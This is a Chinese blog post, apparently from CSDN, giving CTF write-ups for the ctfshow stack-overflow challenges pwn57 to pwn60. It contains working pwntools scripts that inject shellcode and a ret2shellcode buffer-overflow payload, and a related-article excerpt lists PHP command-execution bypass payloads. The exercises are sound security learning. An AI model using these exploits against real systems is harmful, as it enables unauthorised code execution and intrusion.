ctfshow做题笔记—栈溢出—pwn57~pwn60

最新推荐文章于 2025-04-14 23:46:10 发布
原创 最新推荐文章于 2025-04-14 23:46:10 发布 · 487 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #学习

目录

前言

一、pwn57(先了解一下简单的64位shellcode吧)

二、pwn58

三、pwn59(64位 无限制)

四、pwn60(入门难度shellcode)

前言

往前写了几道题,与shellcode有关,关于shellcode还不是太懂。

一、pwn57(先了解一下简单的64位shellcode吧

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn57
[*] '/home/kali/桌面/ctfshoww/pwn57'
    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    Stripped:   No

没啥。

应该也是直接执行:

from pwn import *
p=remote("pwn.challenge.ctf.show",28235)
p.interactive()

二、pwn58

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn58
[*] '/home/kali/桌面/ctfshoww/pwn58'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

也没有开啥保护。

logo明显提示用shellcode,所以我们需要发送sellcode。

Exp:

from pwn import *
e=ELF("./pwn58")
p=remote("pwn.challenge.ctf.show",28178)
shellcode=asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()

三、pwn59(64位 无限制

Checksec:

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn59
[*] '/home/kali/桌面/ctfshoww/pwn59'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
Stripped:   No

是64位的64位 无限制

也是写入shellcode。

看一下ROP:

ROPgadget --binary ./pwn50 --only "pop rbx|ret"

Gadgets information
============================================================
0x00000000004004fe : ret
0x0000000000400d74 : ret 0xfff9
0x0000000000400642 : ret 1

Unique gadgets found: 3

ret=0x4004fe

一开始我是这样写的;

from pwn import *
p = remote('pwn.challenge.ctf.show',28256)
shellcode = asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()

但是打不通,问了问人机,加了一个架构,就能打通了:

from pwn import *
context.arch='amd64'
p = remote('pwn.challenge.ctf.show',28256)
shellcode = asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()

四、pwn60入门难度shellcode

查看一下程序:

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn60
[*] '/home/kali/桌面/ctfshoww/pwn60'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
    Debuginfo:  Yes

没开什么保护。

主要是这个函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("CTFshow-pwn can u pwn me here!!");
  gets((char *)&v4);
  strncpy(buf2, (const char *)&v4, 0x64u);
  printf("See you ~");
  return 0;
}

我们需要利用buf2,在其后面接shellcode

buf2_ar=0x804A080

我们需要用pwndbg确定一下:

确定偏移是112

Exp:

from pwn import *
context.log_level='debug'
p=remote("pwn.challenge.ctf.show",28264)
e=ELF("./pwn60")
buf2_ar=e.sym['buf2']
offset=112
shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(offset,b'a')+p32(buf2_ar)
p.recvuntil("CTFshow-pwn can u pwn me here!!")
p.sendline(payload)
p.interactive()

继续学习中......

CTFshow-PWN-栈溢出pwn60-pwn61)
Welcome To Myon'Blog !
07-08 931
摘要:本文分析了两个CTF pwn题目的解题过程。第一个32位程序(pwn60)存在RWX段和栈溢出漏洞,通过将shellcode写入.bss段并跳转执行成功getshell。第二个64位程序(pwn61)虽然开启了PIE保护,但通过printf泄露栈地址,由于shellcode空间不足,改用将shellcode写入栈中不受影响的偏移位置(v5_addr+0x20)成功执行。两个题目分别通过远程攻击获得flag:ctfshow{9129ee6c-b09e-47b8-addd-9accb8932587}和ct
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5646
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfshow刷题笔记栈溢出pwn53~pwn56
Yilanchia的博客
02-19 853
它先循环读取,每次一个字节,直到读取到换行符(ascll:10 0xa),循环读取才会结束,__isoc99_sscanf(v2,”%d”,&nbytes)这个函数从v2中读取一个整数,存放到nbytes变量中,这个变量决定了我们能够向buf写入的数据大小,我们想要造成溢出,这个数据就需要大一点,接下来,就去比较s1与global_canary是否相同,相同这个函数才能正常返回,造成溢出。,应该需要找到flag之间的关系。主要是提示用户输入数据,输出欢迎信息并让用户输入密码,进行比较,以便执行flag。
Pwn学习-ret2shellcode
cdl10000的博客
11-04 658
此处有坑,由于环境不匹配,使用vmmap查看没有发现rwxp权限,实际该程序0x804a000 0x804b000 段具备执行权限。使用ida调试发现buf2函数地址0804A080正好位于可执行范围内,因此借用buf2函数来构造shellcode。本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。开始要做的工作都一样,查看程序保护措施,查看伪代码,查看敏感函数。没有发现敏感函数,因此需要查找能够执行的段,构造shell函数。再次计算偏移量,计算方法参考。
CTFshow PWN入门(暂时弃坑)
songmoshangchen的博客
10-23 551
一段炫彩的画面(指彩色打印与“消灭人类暴政”)过后,我们就得到shell去找flag了。一共会下载4个文件下来,再VM里面点击.ovf文件,然后导入即可。ctfshow提供的pwn专用机的VM安装如下所示。下个镜像先,先找个finalShell连接一下。
ctfshow刷题笔记栈溢出pwn61~pwn64
Yilanchia的博客
03-02 1200
此外,leave ret 之后,程序可能会跳转到一个无效地址,导致崩溃。这几道都是与shellcode有关的题,实在是不会写,还是试了试,记录一下,收集了一些shellcode。根据之前学的知识,7(port参数)是可读可写的意思,所以,我们任然可以注入shellcode。关于shellcode我也不会写,所以去搜了一些shellcode,一般情况下还是能用的。遇到的一个问题是shellcode太长,超出了v4,v5的范围,这是为什么呢?也是地址随机化,提前运行的界面和上一道题差不多,会给一个地址。
ctfshow做题笔记栈溢出pwn65~pwn68
Yilanchia的博客
03-09 855
首先这道题并没有开启NX,我们任然可以注入shellcode,但是我们拟在 var_1010 中写入shellcode的地址并执行,因为程序最后读取了一个地址然后执行,这里可以执行shellcode,但是shellcode的参数写在哪里呢,似乎seed是个不错的选则,但是seed的准确地址我们无从得知,所以这个滑坡可以起到很大的作用,特别注意下面的类似的代码,cdqe 是一条指令,它的作用是将 32 位寄存器 EAX 的值扩展到 64 位寄存器 RAX 中。3是一个定值,就是v2的地址到seed的距离。
ctfshow做题笔记栈溢出pwn75~pwn79
最新发布
Yilanchia的博客
04-14 954
其核心思想是利用程序中某些寄存器指向的地址(如栈上的缓冲区地址),并通过查找 jmp reg 或 call reg 指令,将程序的控制流转移到该寄存器指向的地址,从而执行注入的 shellcode。当然需要用到rdi,ret。主要原因就是栈溢出之后,比如这道题剩下的栈空间已经不足以装下整个payload,利用栈迁移就可以将esp这个栈指针指向新的栈空间,这样就可以继续写入我们的payload了。每次迁移时,都需要提前计算并布置好新的栈空间的地址信息,以便在执行leave指令时能够正确地迁移到新的栈空间。
ctfshow做题笔记栈溢出pwn41~pwn44(创作纪念日更新)
Yilanchia的博客
02-07 1052
在利用buf2的地方根本上就是利用0x804b000 - 0x804c000这个数据段,所以可以使用0x804c000-16作为bin_addr把payload中的buf2_addr换为bin_addr。/bin/sh:是系统中默认 Shell 解释器的绝对路径,通常是一个指向具体 Shell 的符号链接(如 dash、bash 等)。若 PATH 包含 /bin,则 sh 实际会调用 /bin/sh。打开ida查看的确没有/bin/sh,但是一想,可不可以写入一个/bin/sh呢。
ctfshow做题笔记栈溢出pwn45~pwn48
Yilanchia的博客
02-10 944
但是怎么都timeout,偏移量是重新用pwndbg调试出来的,看来确实有点小错误。于是去学习了一些其他大佬的写法,也学到了一些应对办法。两天没更了,因为打了VNCFTF,还是太弱了,只能做一道异形文字的misc就结束了,pwn一直打不通(先打开ida瞅瞅,其实题目也说了无system无/bin/sh。没有write了,试试用puts吧,更简单了呢。被上一道题硬控半天,这道题不会也要被硬控吧。哎呦,确实可以,也算是对模板越来越熟悉了。由于lib库已经装在本地,省大事了。),于是沉默一天,还是继续学习吧。
[buuctf pwn]rip
qq_72564509的博客
11-18 854
同时,栈是从高地址向低地址进行的,从栈底到栈顶这部分空间,可以用于存储函数内使用的数据在内存中,因为栈是从高地址向低地址,所以栈底指针的位置值是要大于等于栈顶指针的。
ctfshowpwn 45 -> 90(已更新33)栈溢出
2302_77659150的博客
10-20 2474
ctfshow pwn题的最新(2024)可用代码
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
Firebasky的博客
09-18 1982
1. web58-65 payload:c=show_source('flag.php'); 2. web66 1.查看flag文件 c=print_r(scandir("/")); c=highlight_file('/flag.txt'); 3. web67 盲猜 c=highlight_file('/flag.txt'); 4. web68-70 尝试include('index.php'); 发现字节太大了 直接盲猜c=include('/flag.txt'); 5. web71 <?php
从零开始搭建Ubuntu CTF-pwn环境
热门推荐
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
ctfshow web入门58-77绕过disable function
羽的博客
09-17 2591
该系列为php中绕过disable function的题目 下文中写的过xxx(65之前的)表示此题及此题之前的都可以过 通过复制,重命名读取php文件内容(函数执行后,访问url/flag.txt) 函数: copy() rename() 用法: copy("flag.php","flag.txt"); //过60 rename("flag.php","flag.txt"); //过60 单一函数读文件内容: 函数: file_get_contents() r
gcc 编译 -unknown-linux-gnu,C语言再学习 -- GCC编译过程
weixin_34887818的博客
05-09 555
一、GCC简介:gcc的原名叫做GNU C语言 编译器(GNU C Compile),只能编译C语言程序,后来很快就做了扩展,支持了更多的编程语言,比如C+ Object-c ...,改名为GNC 编译器 套件(GNU Compile Collection) 支持很多的硬件和操作系统。二、编译过程C语言的编译过程可分为四个阶段:预处理->>编译->>汇编->>链...
Kernel PWN入门——Kernel ROP
weixin_66578482的博客
02-27 1607
笔记参考自Kernel ROP - CTF Wiki ,主要记录步骤以及学习过程中的一些思考,主要用来复习,例题是强网杯 2018 - core。Kernel PWN入门——Kernel ROP 环境搭建 分析题目 找gadget 看start.sh 看init 内核启动 分析驱动文件 EXP getshell 题目给了 bzImage,core.cpio,start.sh 以及 vmlinux 四个文件,接下来简单介绍一下。
CTFshow-pwn入门-前置基础
akdelt的博客
01-15 883
esi 存储的是 msg 的地址,然后寄存器间接寻址把 msg 地址的内容拿出来给 eax 了。我们直接用 ida 看看 080490E8 地址上的值就行了。:运行此文件,将得到的字符串以ctfshow{xxxxx}提交。计算一下 eax 寄存器的值就行了(好臭的 flag,悲。所以我们把下载好的 elf 文件拿去执行即可。:寄存器间接寻址方式结束后eax寄存器的值为?: 立即寻址方式结束后eax寄存器的值为?:寄存器寻址方式结束后edx寄存器的值为?:直接寻址方式结束后ecx寄存器的值为?
vulnhub5
qq_64201116的博客
11-21 363
​ 表示将前一个命令的标准输出(在这种情况下是 "payload" 字符串)重定向到 ./add_record 程序的标准输入,这样 ./add_record 将从标准输入读取 "payload" 字符串。下一步工作就是测试哪个位置可以覆盖 EIP,因为我们输入的 1000 个 A 中不知道具体是哪几个站住了 EIP 的地址。是一个用户登录注册的地方,因为这里没有 admin 的邮箱地址,所以我们只能尝试使用注册来看看登录后的系统是否存在漏洞。这里发现可以覆盖掉栈的地址,说明我们这里是可能存在漏洞的。
ctfshow pwn入门栈溢出
04-02
嗯,用户想学习CTFShow平台上的PWN入门级栈溢出攻击技巧,包括教程、原理和实例。好的,我需要先回顾栈溢出的基本原理,然后结合CTFShow的题目例子来解释。首先,栈溢出是覆盖返回地址来控制程序流程,对吧?比如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yilanchia

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值